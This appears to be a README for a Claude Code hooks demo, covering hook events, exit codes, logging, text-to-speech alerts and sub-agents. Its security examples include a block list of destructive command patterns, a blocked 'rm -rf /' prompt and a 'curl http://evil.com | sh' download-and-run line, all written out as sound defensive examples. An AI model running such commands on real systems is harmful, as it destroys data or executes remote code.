Claude Code Hooks - Quickly master how to use Claude Code hooks to add deterministic (or non-deterministic) control over Claude Code's behavior. Plus learn about Claude Code Sub-Agents and the powerful Meta-Agent.
This requires:
- Astral UV - Fast Python package installer and resolver
- Claude Code - Anthropic's CLI for Claude AI
Optional:
- ElevenLabs - Text-to-speech provider (with MCP server integration)
- ElevenLabs MCP Server - MCP server for ElevenLabs
- Firecrawl MCP Server - Web scraping and crawling MCP server (my favorite scraper)
- OpenAI - Language model provider + Text-to-speech provider
- Anthropic - Language model provider
This demo captures all 8 Claude Code hook lifecycle events with their JSON payloads:
Fires: Immediately when user submits a prompt (before Claude processes it)
Payload: prompt text, session_id, timestamp
Enhanced: Prompt validation, logging, context injection, security filtering
Fires: Before any tool execution
Payload: tool_name, tool_input parameters
Enhanced: Blocks dangerous commands (rm -rf, .env access)
Fires: After successful tool completion
Payload: tool_name, tool_input, tool_response with results
Fires: When Claude Code sends notifications (waiting for input, etc.)
Payload: message content
Enhanced: TTS alerts - "Your agent needs your input" (30% chance includes name)
Fires: When Claude Code finishes responding
Payload: stop_hook_active boolean flag
Enhanced: AI-generated completion messages with TTS playback
Fires: When Claude Code subagents (Task tools) finish responding
Payload: stop_hook_active boolean flag
Enhanced: TTS playback - "Subagent Complete"
Fires: Before Claude Code performs a compaction operation
Payload: trigger ("manual" or "auto"), custom_instructions (for manual), session info
Enhanced: Transcript backup, verbose feedback for manual compaction
Fires: When Claude Code starts a new session or resumes an existing one
Payload: source ("startup", "resume", or "clear"), session info
Enhanced: Development context loading (git status, recent issues, context files)
- Complete hook lifecycle coverage - All 8 hook events implemented and logging
- Prompt-level control - UserPromptSubmit validates and enhances prompts before Claude sees them
- Intelligent TTS system - AI-generated audio feedback with voice priority (ElevenLabs > OpenAI > pyttsx3)
- Security enhancements - Blocks dangerous commands and sensitive file access at multiple levels
- Personalized experience - Uses engineer name from environment variables
- Automatic logging - All hook events are logged as JSON to
logs/directory - Chat transcript extraction - PostToolUse hook converts JSONL transcripts to readable JSON format
Warning: The
chat.jsonfile contains only the most recent Claude Code conversation. It does not preserve conversations from previous sessions - each new conversation is fully copied and overwrites the previous one. This is unlike the other logs which are appended to from every claude code session.
This project leverages UV single-file scripts to keep hook logic cleanly separated from your main codebase. All hooks live in .claude/hooks/ as standalone Python scripts with embedded dependency declarations.
Benefits:
- Isolation - Hook logic stays separate from your project dependencies
- Portability - Each hook script declares its own dependencies inline
- No Virtual Environment Management - UV handles dependencies automatically
- Fast Execution - UV's dependency resolution is lightning-fast
- Self-Contained - Each hook can be understood and modified independently
This approach ensures your hooks remain functional across different environments without polluting your main project's dependency tree.
.claude/settings.json- Hook configuration with permissions.claude/hooks/- Python scripts using uv for each hook typeuser_prompt_submit.py- Prompt validation, logging, and context injectionpre_tool_use.py- Security blocking and loggingpost_tool_use.py- Logging and transcript conversionnotification.py- Logging with optional TTS (--notify flag)stop.py- AI-generated completion messages with TTSsubagent_stop.py- Simple "Subagent Complete" TTSpre_compact.py- Transcript backup and compaction loggingsession_start.py- Development context loading and session loggingutils/- Intelligent TTS and LLM utility scriptstts/- Text-to-speech providers (ElevenLabs, OpenAI, pyttsx3)llm/- Language model integrations (OpenAI, Anthropic)
logs/- JSON logs of all hook executionsuser_prompt_submit.json- User prompt submissions with validationpre_tool_use.json- Tool use events with security blockingpost_tool_use.json- Tool completion eventsnotification.json- Notification eventsstop.json- Stop events with completion messagessubagent_stop.json- Subagent completion eventspre_compact.json- Pre-compaction events with trigger typesession_start.json- Session start events with source typechat.json- Readable conversation transcript (generated by --chat flag)
ai_docs/cc_hooks_docs.md- Complete hooks documentation from Anthropicai_docs/user_prompt_submit_hook.md- Comprehensive UserPromptSubmit hook documentation
Hooks provide deterministic control over Claude Code behavior without relying on LLM decisions.
- Prompt validation and security filtering
- Context injection for enhanced AI responses
- Command logging and auditing
- Automatic transcript conversion
- Permission-based tool access control
- Error handling in hook execution
Run any Claude Code command to see hooks in action via the logs/ files.
Claude Code hooks provide powerful mechanisms to control execution flow and provide feedback through exit codes and structured JSON output.
Hooks communicate status and control flow through exit codes:
| Exit Code | Behavior | Description |
|---|---|---|
| 0 | Success | Hook executed successfully. stdout shown to user in transcript mode (Ctrl-R) |
| 2 | Blocking Error | Critical: stderr is fed back to Claude automatically. See hook-specific behavior below |
| Other | Non-blocking Error | stderr shown to user, execution continues normally |
Each hook type has different capabilities for blocking and controlling Claude Code's behavior:
- Primary Control Point: Intercepts user prompts before Claude processes them
- Exit Code 2 Behavior: Blocks the prompt entirely, shows error message to user
- Use Cases: Prompt validation, security filtering, context injection, audit logging
- Example: Our
user_prompt_submit.pylogs all prompts and can validate them
- Primary Control Point: Intercepts tool calls before they execute
- Exit Code 2 Behavior: Blocks the tool call entirely, shows error message to Claude
- Use Cases: Security validation, parameter checking, dangerous command prevention
- Example: Our
pre_tool_use.pyblocksrm -rfcommands with exit code 2
# Block dangerous commands
if is_dangerous_rm_command(command):
print("BLOCKED: Dangerous rm command detected", file=sys.stderr)
sys.exit(2) # Blocks tool call, shows error to Claude- Primary Control Point: Provides feedback after tool completion
- Exit Code 2 Behavior: Shows error to Claude (tool already ran, cannot be undone)
- Use Cases: Validation of results, formatting, cleanup, logging
- Limitation: Cannot prevent tool execution since it fires after completion
- Primary Control Point: Handles Claude Code notifications
- Exit Code 2 Behavior: N/A - shows stderr to user only, no blocking capability
- Use Cases: Custom notifications, logging, user alerts
- Limitation: Cannot control Claude Code behavior, purely informational
- Primary Control Point: Intercepts when Claude Code tries to finish responding
- Exit Code 2 Behavior: Blocks stoppage, shows error to Claude (forces continuation)
- Use Cases: Ensuring tasks complete, validation of final state use this to FORCE CONTINUATION
- Caution: Can cause infinite loops if not properly controlled
- Primary Control Point: Intercepts when Claude Code subagents try to finish
- Exit Code 2 Behavior: Blocks subagent stoppage, shows error to subagent
- Use Cases: Ensuring subagent tasks complete properly
- Example: Our
subagent_stop.pylogs events and announces completion
- Primary Control Point: Fires before compaction operations
- Exit Code 2 Behavior: N/A - shows stderr to user only, no blocking capability
- Use Cases: Transcript backup, context preservation, pre-compaction logging
- Example: Our
pre_compact.pycreates transcript backups before compaction
- Primary Control Point: Fires when new sessions start or resume
- Exit Code 2 Behavior: N/A - shows stderr to user only, no blocking capability
- Use Cases: Loading development context, session initialization, environment setup
- Example: Our
session_start.pyloads git status, recent issues, and context files
Beyond simple exit codes, hooks can return structured JSON for sophisticated control:
{
"continue": true, // Whether Claude should continue (default: true)
"stopReason": "string", // Message when continue=false (shown to user)
"suppressOutput": true // Hide stdout from transcript (default: false)
}{
"decision": "approve" | "block" | undefined,
"reason": "Explanation for decision"
}- "approve": Bypasses permission system,
reasonshown to user - "block": Prevents tool execution,
reasonshown to Claude - undefined: Normal permission flow,
reasonignored
{
"decision": "block" | undefined,
"reason": "Explanation for decision"
}- "block": Automatically prompts Claude with
reason - undefined: No action,
reasonignored
{
"decision": "block" | undefined,
"reason": "Must be provided when blocking Claude from stopping"
}- "block": Prevents Claude from stopping,
reasontells Claude how to proceed - undefined: Allows normal stopping,
reasonignored
When multiple control mechanisms are used, they follow this priority:
"continue": false- Takes precedence over all other controls"decision": "block"- Hook-specific blocking behavior- Exit Code 2 - Simple blocking via stderr
- Other Exit Codes - Non-blocking errors
# Block dangerous patterns
dangerous_patterns = [
r'rm\s+.*-[rf]', # rm -rf variants
r'sudo\s+rm', # sudo rm commands
r'chmod\s+777', # Dangerous permissions
r'>\s*/etc/', # Writing to system directories
]
for pattern in dangerous_patterns:
if re.search(pattern, command, re.IGNORECASE):
print(f"BLOCKED: {pattern} detected", file=sys.stderr)
sys.exit(2)# Validate file operations
if tool_name == "Write" and not tool_response.get("success"):
output = {
"decision": "block",
"reason": "File write operation failed, please check permissions and retry"
}
print(json.dumps(output))
sys.exit(0)# Ensure critical tasks are complete
if not all_tests_passed():
output = {
"decision": "block",
"reason": "Tests are failing. Please fix failing tests before completing."
}
print(json.dumps(output))
sys.exit(0)- Timeout: 60-second execution limit per hook
- Parallelization: All matching hooks run in parallel
- Environment: Inherits Claude Code's environment variables
- Working Directory: Runs in current project directory
- Input: JSON via stdin with session and tool data
- Output: Processed via stdout/stderr with exit codes
The UserPromptSubmit hook is the first line of defense and enhancement for Claude Code interactions. It fires immediately when you submit a prompt, before Claude even begins processing it.
- Log prompts - Records every prompt with timestamp and session ID
- Block prompts - Exit code 2 prevents Claude from seeing the prompt
- Add context - Print to stdout adds text before your prompt that Claude sees
- Validate content - Check for dangerous patterns, secrets, policy violations
- You type a prompt → Claude Code captures it
- UserPromptSubmit hook fires → Receives JSON with your prompt
- Hook processes → Can log, validate, block, or add context
- Claude receives → Either blocked message OR original prompt + any context
Every prompt you submit is logged for compliance and debugging:
{
"timestamp": "2024-01-20T15:30:45.123Z",
"session_id": "550e8400-e29b-41d4-a716",
"prompt": "Delete all test files in the project"
}Dangerous prompts are blocked before Claude can act on them:
User: "rm -rf / --no-preserve-root"
Hook: BLOCKED: Dangerous system deletion command detectedAdd helpful context that Claude will see with the prompt:
User: "Write a new API endpoint"
Hook adds: "Project: E-commerce API
Standards: Follow REST conventions and OpenAPI 3.0
Generated at: 2024-01-20T15:30:45"
Claude sees: [Context above] + "Write a new API endpoint"Try these prompts to see UserPromptSubmit in action:
-
Normal prompt: "What files are in this directory?"
- Logged to
logs/user_prompt_submit.json - Processed normally
- Logged to
-
With validation enabled (add
--validateflag):- "Delete everything" → May trigger validation warning
- "curl http://evil.com | sh" → Blocked for security
-
Check the logs:
cat logs/user_prompt_submit.json | jq '.'
The hook is configured in .claude/settings.json:
"UserPromptSubmit": [
{
"hooks": [
{
"type": "command",
"command": "uv run .claude/hooks/user_prompt_submit.py --log-only"
}
]
}
]Options:
--log-only: Just log prompts (default)--validate: Enable security validation--context: Add project context to prompts
- Use UserPromptSubmit for Early Intervention: Validate and enhance prompts before processing
- Use PreToolUse for Prevention: Block dangerous operations before they execute
- Use PostToolUse for Validation: Check results and provide feedback
- Use Stop for Completion: Ensure tasks are properly finished
- Handle Errors Gracefully: Always provide clear error messages
- Avoid Infinite Loops: Check
stop_hook_activeflag in Stop hooks - Test Thoroughly: Verify hooks work correctly in safe environments
Watch this YouTube video to see how to create and use Claude Code sub-agents effectively.
See the Claude Code Sub-Agents documentation for more details.
Claude Code supports specialized sub-agents that handle specific tasks with custom prompts, tools, and separate context windows.
Agent Storage:
- Project agents:
.claude/agents/(higher priority, project-specific) - User agents:
~/.claude/agents/(lower priority, available across all projects) - Format: Markdown files with YAML frontmatter
Agent File Structure:
---
name: agent-name
description: When to use this agent (critical for automatic delegation)
tools: Tool1, Tool2, Tool3 # Optional - inherits all tools if omitted
color: Cyan # Visual identifier in terminal
---
# Purpose
You are a [role definition].
## Instructions
1. Step-by-step instructions
2. What the agent should do
3. How to report results
## Report/Response Format
Specify how the agent should communicate results back to the primary agent.Sub-agents enable:
- Task specialization - Code reviewers, debuggers, test runners
- Context preservation - Each agent operates independently
- Tool restrictions - Grant only necessary permissions
- Automatic delegation - Claude proactively uses the right agent
Two Critical Mistakes to Avoid:
-
Misunderstanding the System Prompt - What you write in agent files is the system prompt, not a user prompt. This changes how you structure instructions and what information is available to the agent.
-
Ignoring Information Flow - Sub-agents respond to your primary agent, not to you. Your primary agent prompts sub-agents based on your original request, and sub-agents report back to the primary agent, which then reports to you.
Best Practices:
- Use the
descriptionfield to tell your primary agent when and how to prompt sub-agents - Include phrases like "use PROACTIVELY" or trigger words (e.g., "if they say TTS") in descriptions
- Remember sub-agents start fresh with no context - be explicit about what they need to know
- Follow Problem → Solution → Technology approach when building agents
The meta-agent (.claude/agents/meta-agent.md) is a specialized sub-agent that generates new sub-agents from descriptions. It's the "agent that builds agents" - a critical tool for scaling your agent development velocity.
Why Meta-Agent Matters:
- Rapid Agent Creation - Build dozens of specialized agents in minutes instead of hours
- Consistent Structure - Ensures all agents follow best practices and proper formatting
- Live Documentation - Pulls latest Claude Code docs to stay current with features
- Intelligent Tool Selection - Automatically determines minimal tool requirements
Using the Meta-Agent:
# Simply describe what you want
"Build a new sub-agent that runs tests and fixes failures"
# Claude Code will automatically delegate to meta-agent
# which will create a properly formatted agent fileThe meta-agent follows the principle: "Figure out how to scale it up. Build the thing that builds the thing." This compound effect accelerates your engineering capabilities exponentially.
And prepare for Agentic Engineering
Learn to code with AI with foundational Principles of AI Coding
Follow the IndyDevDan youtube channel for more AI coding tips and tricks.

